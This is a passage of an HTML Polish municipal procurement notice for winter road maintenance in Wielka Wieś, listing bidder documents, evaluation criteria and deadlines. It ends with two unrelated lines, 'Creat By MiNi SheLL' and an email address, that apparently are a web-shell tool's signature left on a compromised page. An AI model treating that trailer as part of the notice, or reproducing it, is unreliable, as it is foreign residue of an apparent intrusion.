<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>W Wykazie usług należy wskazać co najmniej 2 usługi zimowego utrzymania dróg o długości minimum 50 km w jednym sezonie zimowym.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz OFERTA- załącznik nr 5 do SIWZ.
Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika 
z innych dokumentów dołączonych do oferty składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza 
Oświadczenia i dokumenty wymagane postanowieniami rozdziału VIII SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - czas reakcji podjęcie działań związanych z odśnieżaniem bądź likwidacją śliskości - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmian terminu Zamawiający zastrzega sobie możliwość zmiany  terminów realizacji umowy  z przyczyn niezależnych, w szczególności w przypadku wystąpienia warunków atmosferycznych powodujących konieczność realizacji przedmiotu zamówienia określonego w Rozdz. I  SIWZ poza określonymi w SIWZ terminami.
Zamawiający zastrzega sobie prawo do zmiany zakresu zamówienia w przypadku zwiększenia ilości powierzchni do odśnieżania (nowe inwestycje, inwestycje w toku)
Dopuszcza się możliwość dokonania zmiany umowy o zamówienie w przypadku zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wielka-wies.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wielka Wieś, ul. Wesoła 48, 32-089 Wielka Wieś, pok. 303.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2015 godzina 09:30, miejsce: Urząd Gminy Wielka Wieś, ul. Wesoła 48, 32-089 Wielka Wieś, Biuro Obsługi Interesantów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com